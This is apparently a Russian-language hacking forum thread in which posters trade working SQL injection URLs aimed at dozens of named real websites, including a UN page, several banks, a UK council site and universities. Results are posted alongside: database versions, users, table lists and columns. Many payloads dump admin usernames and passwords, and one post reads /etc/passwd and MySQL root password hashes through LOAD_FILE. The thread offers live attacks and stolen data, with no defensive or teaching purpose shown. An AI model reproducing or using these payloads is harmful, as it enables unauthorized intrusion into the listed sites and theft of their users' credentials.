SQL Инъекции

Code:

http://www.rukodelie.ru/index.php?page=cart&lastid=1+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44

@localhost | 5.0.26-lk-log | rukodelier | pc-linux-gnu

 

Code:

http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20db_name%28%29%29--

Имя базы данных : News

Code:

http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20system_user%29--

Владелец : web

Code:

http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version--

Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

Теперь таблицы и колонки

Code:

http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%29--

Одна из таблиц: failedemails

 

http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

version(): 4.0.27-standard
user(): dbo273434928@localhost
database(): db273434928
Также есть таблица admin (+админка http://www.arctic-cooling.com/admin)

 

5.0.81-log:shansco_shans:[email protected]:unknown-linux-gnu

БД

Code:

nformation_schema@shansco_forum@shansco_shans

таблцы

Code:

documents@news@news_copy@numbers@pages@poll_comment@poll_config@poll_data@poll_index@poll_ip@poll_log@poll_templates@poll_templateset@poll_user@rec_banners@rec_compact@rec_compact_tmp@rec_date@rec_firm@rec_firm_block@rec_firm_name@rec_firm_tmp@rec_private@rec_private_tmp@rec_rubric@rubrics@sav_que

таблицы форума

Code:

phpbb_attach_quota@phpbb_attachments@phpbb_attachments_config@phpbb_attachments_desc@phpbb_auth_access@phpbb_banlist@phpbb_categories@phpbb_config@phpbb_confirm@phpbb_disallow@phpbb_extension_groups@phpbb_extensions@phpbb_forbidden_extensions@phpbb_forum_prune@phpbb_forums@phpbb_groups@phpbb_posts@phpbb_posts_text@phpbb_privmsgs@phpbb_privmsgs_text@phpbb_quota_limits@phpbb_ranks@phpbb_search_results@phpbb_search_wordlist@phpbb_search_wordmatch@phpbb_sessions@phpbb_sessions_keys@phpbb_smilies@phpbb_themes@phpbb_themes_name@phpbb_topics@phpbb_topics_watch@phpbb_user_group@phpbb_users@phpbb_vote_desc@phpbb_vote_results@phpbb_vote_voters@phpbb_words

poll_user:

Code:

user_id@username@userpass@session@last_visit 

poll_log

Code:

log_id@poll_id@option_id@timestamp@ip_addr@host@agent

Code:

http://shans.com.ua/index.php?m=nr&id=-6421+union+select+1,2,group_concat(concat_ws(0x3a,username,userpass,last_visit)%20separator%200x3a)+from+poll_user--+&in=60

админка и форум соответсвенно в каталогах:

 

Code:

http://www.karlson-e.ru/?page=product&dir=-1%27+and+1=1+union+select+1,2,3,4,5,6,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,8,9+--+

webuser@localhost
5.1.34-log
karlson
portbld-freebsd7.1

 

Мускул 4й
http://www.digitalflywheel.com/case.php?id=-4+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,0x3a,password)+from+users+limit+1,1
MySQL 4.0.27-log
users::username,password
http://www.digitalflywheel.com/admin

 

Bank ))

Code:

http://www.fidelitybank.com.gh/management/details.php?id=-1+union+select+1,2,3,4,5,6,7--

Database:
Version : 4.1.22-standard-log
User: [email protected]
OS: pc-linux-gnu

 

идея shell_c0de Bank ))

concerns_stella@localhost@[email protected]

akciaban_bank@localhost@[email protected]@unknown-linux-gnu

Event: bank_sparhafen@localhost:5.0.37-community-nt:bank_sparhafen:Win32

другие
65 колонок

inforesipps@localhost:inforesipps:4.1.25-logortbld-freebsd6.3

 

http://www.ak-cent.kz/news?news_category=-1+union+select+1,2,3,4,5,6,7
akcentk_user@localhost
5.0.77-community
akcentk_cms
unknown-linux-gnu

 

Code:

http://delemont.com.au/description.php?intProductID=71%27+and+substring%28@@version,1,1%29=%274
http://www.moretonisland.com.au/product.php?id=67768+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

 

класичечкий вариант блокировался1!!

8055@localhost:8055:5.0.77:redhat-linux-gnu1

atto@localhost:atto_new:4.1.22-logortbld-freebsd6.2

 

Database Version: 5.0.81-community
Database name: murzifan_helpstudents
User name: murzifan_murzifa@localhost

Database Version: 4.0.15-nt
Database name: mgounb
User name: root@localhost

 

Code:

http://www.kuroed.com/?id=-1+and+1=1+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15+--+

kuroed@localhost
kuroed1db
4.1.22-log
portbld-freebsd6.3

 

MySQL 5:

www.johnsoncitypress.com

Code:

http://www.johnsoncitypress.com/News/article.php?ID=71327'+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,user_name,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21+from+ClinchFestStore.wp_users+limit+0,1+--+

www.sewe.com

Code:

http://www.sewe.com/gallery.php?id=9+and+1=2+union+select+1,2,3,4,5,6,7,group_concat%28column_name%29,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+--+

www.365gunspor.com

Code:

http://www.365gunspor.com/unluler/picture.php?id=34%29+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,userbane,password%29%29+from+sporadmin+--+

www.faithwriters.com

Code:

http://www.faithwriters.com/wc-article-editors-previous.php?id=31730%27+and+7=9+union+select+1,2,3,4,5,group_concat%28concat_ws%280x3a,username,password%29%29,7,8,9,10+from+adminpass+--+

www.talkofnewyork.com

Code:

http://www.talkofnewyork.com/cool2us/cool.php?ID=396+and+1=2+union+select+1,2,3,concat_ws%280x3a,id,username,password%29,5,6,7,8+from+admin+limit+0,1+--+

www.hoylegaming.com

Code:

http://www.hoylegaming.com/game.php?id=18+and+2=1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,77,88,99,20,21,22,23,24+from+admin_users+--+

soccerladuma.mobi

Code:

http://soccerladuma.mobi/news.php?id=21263+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,fullname,email,passw,status%29%29,4,5,6,7,8+from+admin--

www.open.ac.uk

Code:

http://www.open.ac.uk/picetl/news/details/detail.php?itemId=496ddbbb661f5%27+and+1=2+union+select+1,2,3,4,5,6,concat_ws%28CHAR%2858,58%29,%20username,%20password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+SecurityCmsUser+limit+0,1/*

www.rockfreaks.net

Code:

http://www.rockfreaks.net/index.php?page=albumreviews&id=-2398+union+select+1,table_schema,3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=CHAR%2898,95,117,115,101,114,115%29

www.rmmedia.ru

Code:

http://www.rmmedia.ru/news.php?id=48+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5+from+admin_audioshare.administrators--

www.yourlistonline.com

Code:

http://www.yourlistonline.com/news.php?id=29%27+and+1=2+union+select+1,2,3,group_concat%28concat_ws%280x3a,userName,password%29%29,5,6+from+a_users+--+

www.milim.com

Code:

http://www.milim.com/news.php?id=100+and+1=2+union+select+1,2,3,4,5,6,group_concat%28concat_ws%280x3a,column_name%29%29,8+from+information_schema.columns+where+table_name=0x62625f7573657273+--+

www.cloudveil.com

Code:

http://www.cloudveil.com/company/news.php?id=50+and+1=11+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13+from+information_schema.tables+--+

www.darksidefreefly.com

Code:

http://www.darksidefreefly.com/news.php?id=3+and+1=2+union+select+1,2,3,4,5,group_concat%28table_name%29+from+information_schema.tables--

www.activeodds.info

Code:

http://www.activeodds.info/news.php?id=5445+and+1=2+union+select+1,2,group_concat%28table_name%29,4,5+from+information_schema.tables--

www.mikealstottfamilyfoundation.org

Code:

http://www.mikealstottfamilyfoundation.org/news.php?id=19%27+and+1=2+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8+from+information_schema.tables+--+

MySQL 4:

www.cssdownunder.com

Code:

http://www.cssdownunder.com/site.php?id=345+and+1=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10+--+

epodsolar.com

Code:

http://epodsolar.com/site.php?id=340+and+1=2+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

 

Продолжаем традицию банков )
крупный Америкосовский банк

Code:

http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5--

User: mcsbnhc_ensky@localhost
Version: 4.1.22-standard
Database: mcsbnhc_mcsb
OS: linux-gnu

 

Code:

http://www.lamsade.dauphine.fr/members.php?id_person=-151+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--

Code:

http://www.budd-marseille.fr/news.php?ID=-13+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Code:

http://www.avem.fr/news.php?id=-0148+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

4.0.25-standard-log:avemlfod:[email protected]

Code:

http://www.akata.fr/news.php?id=-449+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9

4.0.26-standard-log:akatav2:[email protected]

Code:

http://www.lephotographe.fr/news/news.php?id=-232+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--

[email protected]:lephotographe:4.1.22-log

 

torreabbey@localhost:5.0.45:torreabbey

Code:

http://www.torre-abbey.org.uk/news.php?nID=-21+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4--

db_dentuser@lxplesk223:5.0.45:dentistry_content

Code:

http://www.dentistry.co.uk/news/news_detail.php?id=2434+limit+0+UnIon(SelecT+1,coNcaT_wS(0x3a,uSer(),VerSion(),daTaBase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26)+--+

nanoorg_news@localhost:5.0.83-log:nanoorg_news

Code:

http://www.nano.org.uk/news/index.php?article=-319+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

council@localhost:4.1.8-nt-max-log:dev_cms

Code:

http://www.thurrock.gov.uk/news/content.php?page=story'+limit+0+union+select+1,2,3,binary(concat_ws(0x3a,user(),version(),database())),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&ID=3530

 

http://thehamsterwheel.net

Code:

http://thehamsterwheel.net/game-reviews.php?id=-33'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.theatrealive.com.au

Code:

http://www.theatrealive.com.au/reviews.php?id=-476+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,firstname,lastname,pwd,user_level),12,13,14,user(),16,17,18,19,20,21,22,23,24+from+users+where+user_level=1+limit+2,1+/*+

http://tformers.com

Code:

http://tformers.com/article.php?sid=-12873+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper,user()),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+1,1+--+

www.gamesnewsi.com

Code:

http://www.gamesnewsi.com/reviews.php?op=showcontent&id=-751+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+5,1+--+

www.arscars.com

Code:

http://www.arscars.com/reviews.php?id=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name)+from+information_schema.tables+--+

www.americandreamcomics.com

Code:

http://www.americandreamcomics.com/reviews.php?op=showcontent&id=-1105+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+0,1+--+

www.clubfandango.co.uk

Code:

http://www.clubfandango.co.uk/reviews.php?id=-2198+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x77705F7573657273+--+

beerdorks.com

Code:

http://beerdorks.com/reviews.php?rev_id=-484+union+select+1,2,concat_ws(0x3a3a,user_login,user_password),4,5,6,7,8,9,10,11,12,13+from+users+--+

www.hollies.co.uk

Code:

http://www.hollies.co.uk/review/reviewindex.php?menu=-2009+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+&st=1

benua.com.ua

Code:

http://benua.com.ua/reviews.php?id=-11+union+select+1,2,concat_ws(0x3a3a,login,pass,status),4+from+clients+--+

www.e-stat.info

Code:

http://www.e-stat.info/?cat=-16'+union+select+1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+group+by+table_schema+--+

www.beelingua.com

Code:

http://www.beelingua.com/reviews.php?id=-1+union+select+1,concat_ws(0x3a3a,id,l_user,l_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+l_admin+--+

www.best-savings-rates.com

Code:

http://www.best-savings-rates.com/reviews.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,password),9,10,11,12+from+users+--+

www.winesellersltd.com

Code:

http://www.winesellersltd.com/reviews.php?id=-10+union+select+concat_ws(0x3a3a,user_name,password),2,3,4,5+from+users+limit+2,10+--+

www.the-junkyard.net

Code:

http://the-junkyard.net/reviews.php?action=viewreview&id=-32'+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users+limit+0,1+--+

www.surclaro.com

Code:

http://www.surclaro.com/reviews.php?op=showcontent&id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+

www.hardwareheaven.com

Code:

http://www.hardwareheaven.com/reviews.php?reviewid=588&pageid=-1'+UnioN+SElect+1+from+authors+--+

www.metalfan.nl

Code:

http://www.metalfan.nl/reviews.php?id=-5491+union+select+1,concat_ws(0x3a3a,user_id,username,user_password,user_level)+from+mf_users+where+user_level=5+/*+

 

MySQL 5.0.87-community-log
http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,column_name),24+from+information_schema.columns+where+table_name=0x7573657273+--
users::user_id,user_login,user_password,user_description,user_level
http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,user_id,0x3a,user_login,0x3a,user_password),24+from+users+--
http://pravoinvest.com.ua:2082/login/

 

Всем прив давно мну не было.Писали нет по стате хл но все равно осмелюсь.

Двиг HLstatsX Community Edition 1.6.5


http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4--&game=css

Version: 5.0.45-log
User: [email protected]
Database: hlstatsce


Читаем : etc/passwd

http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764), 0x3a),4--&game=css


с мускула root

http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,user,password),4+from+mysql.user--&game=css


Если что извиняйте.